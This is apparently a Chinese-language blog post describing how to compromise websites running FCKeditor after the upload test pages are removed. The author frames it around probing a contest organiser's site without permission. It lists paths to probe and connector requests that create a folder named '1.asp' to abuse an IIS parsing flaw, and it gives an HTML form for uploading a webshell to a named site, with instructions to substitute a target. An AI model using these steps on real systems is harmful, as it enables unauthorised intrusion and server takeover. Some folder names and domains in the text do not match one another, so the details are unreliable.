解決Fckeditor刪除所有上傳頁面如何上傳入侵

好久沒有指令碼入侵了,今天因為參加了一個比賽,然後認證居然需要錢來買的,就很不爽,百度了下其官方網,進行了一次安檢,結果是沒有成功,因為iis的檔案解析漏洞補上了,不過學到了一些Fckeditor在沒有上傳頁面的情況下的入侵方式。

首先,你得確定下Fckeditor的版本。

/FCKeditor/editor/dialog/fck_about.html

其次,你確定下以下幾個上傳頁面是否真的被刪除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都已經刪除了,真是太倒黴了,怎麼辦,確認下這些檔案有哪個存在的麼

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以繼續看下去了,我這裡以aspx的為例

1.查看Media目錄下的檔案：

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

紅色Media可以更改為File或者image,相應的進入檔案或者圖片目錄下

2.利用iis解析漏洞建立1.asp特殊目錄

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

紅色的是對應的Media目錄,藍色的是特殊目錄名字

3.構建表單,上傳webshell到特殊目錄

<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>

將以上代表儲存為HTML格式,http://www.91ri.org修改成你入侵的網站地址,Type=Media是對應的Media目錄,1.asp為特殊目錄名。

最後的一些提示

上 傳之後的路徑需要你在上傳表單裡面的代碼裡找,當然,他的呈現方式是一個上傳好了的檔案名稱,全路徑必須你自己組合,我相信你是會的。如果訪問之後發現無法 訪問,試著上傳一張正確的圖片,再進行訪問,如果訪問成功,說明管理員已經補上了IIS路徑解析漏洞,那你得另找出路了。